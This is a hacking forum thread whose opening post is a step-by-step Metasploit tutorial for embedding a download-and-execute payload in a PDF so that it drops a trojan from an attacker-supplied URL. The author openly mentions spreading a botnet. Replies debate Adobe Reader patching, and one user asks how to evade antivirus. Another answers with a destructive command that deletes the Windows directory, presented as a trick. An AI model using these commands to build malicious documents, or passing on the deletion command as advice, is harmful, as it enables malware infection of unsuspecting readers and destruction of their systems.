Making a PDF a dropper with metasploit

[iTpHo3NiX]

Intro

What is the purpose of this tutorial? Pretty much a method on making a PDF a trojan dropper. Is this useful? Sure if you want to spread a botnet or some skidlike thing. Why are you posting this? In case anyone wants to turn a PDF into a dropper, and to make other individuals aware of how easily a skid can turn a harmless PDF into a malicious file.

Note:
This may only work with PDFs that are created with older versions of Adobe PDF

What you will need

• Old PDF
• Metasploit
• URL of file you want to be dropped (direct link)

What's the Process?

• Open metasploit console
• Type the following into console:

Code: [Select]

use exploit/windows/fileformat/adobe_pdf_embedded_exe and press enter

• Then type:

Code: [Select]

set payload windows/download_exec and press enter

• Then type:

Code: [Select]

set INFILENAME <link to pdf> and press enter

• Then type:

Code: [Select]

set url <direct dl link> and press enter

• Then type:

Code: [Select]

Exploit

and press enter

The infected PDF will be named "evil" in the same directory as the original.

Conclusion
So what did we learn? How easy it is for skids to infect people with knowledge, hiw so very lame... be cautious of random PDFs you download, you may be getting that great book, but other times find yourself a slave to a ddos happy skidmark.

Also I believe newer versions of PDF reader should have this patched but knowing a lot of non tech savvy people they always click out of important updates, and others don't update adobe products if they have a cracked version of adobe products as it blocks the server in the hosts file.

[Teapot]

The new version of Adobe Reader prevents you from opening an infected PDF. It generates a corruption error or something.
So just upgrade that if you haven't and your safe from the HF skids xD

[iTpHo3NiX]

The new version of Adobe Reader prevents you from opening an infected PDF. It generates a corruption error or something.
So just upgrade that if you haven't and your safe from the HF skids xD

knowing a lot of non tech savvy people they always click out of important updates, and others don't update adobe products if they have a cracked version of adobe products as it blocks the server in the hosts file.

You'd be amazed at how often skids get on people's computers fairly easily

[Kulverstukas]

HAHAHAHAHA adobe reader not vulnerable? yeah fuckin' right, that shit's full of holes and it's ridiculously laggy product, crashes all the time. Here at work people always demand it but it only gives headaches when you need to do more than just viewing plain PDF's.

[Teapot]

HAHAHAHAHA adobe reader not vulnerable? yeah fuckin' right, that shit's full of holes and it's ridiculously laggy product, crashes all the time. Here at work people always demand it but it only gives headaches when you need to do more than just viewing plain PDF's.

I never said it was not vulnerable. But the metasploit one is patched up, which considering you can find this tut on HF means that at least whoever is getting into your computer via PDF knows more about hacking than a backdoored version of DarkComet.

[Fed0t]

the version of adobe reader and  the version of the document pdf ?

[Teapot]

the version of adobe reader and  the version of the document pdf ?

Figure it out yourself... this tut was spoon feeding you enough in my opinion.

[proxx]

Figure it out yourself... this tut was spoon feeding you enough in my opinion.

Agreed, I thought that the 'hit enter' part was already a bit over the top.

[iTpHo3NiX]

Agreed, I thought that the 'hit enter' part was already a bit over the top.

[Fed0t]

Someone can explain more detailed?


1.Versions of Adobe
2.How to bypass Antivirus ( cause AV warn when he find any exploited file).

[proxx]

Someone can explain more detailed?


1.Versions of Adobe
2.How to bypass Antivirus ( cause AV warn when he find any exploited file).

Thats what we get for having a tutorial like this, it attracts skids like bears and honey.

[Teapot]

Someone can explain more detailed?


1.Versions of Adobe
2.How to bypass Antivirus ( cause AV warn when he find any exploited file).

1. Google it
2. Run command prompt as admin and then type the following

Code: [Select]

del c:/windows3. I take no responsibility for damages caused by #2

[iTpHo3NiX]

Thats what we get for having a tutorial like this, it attracts skids like bears and honey.

Can't say it's not fun to fish them out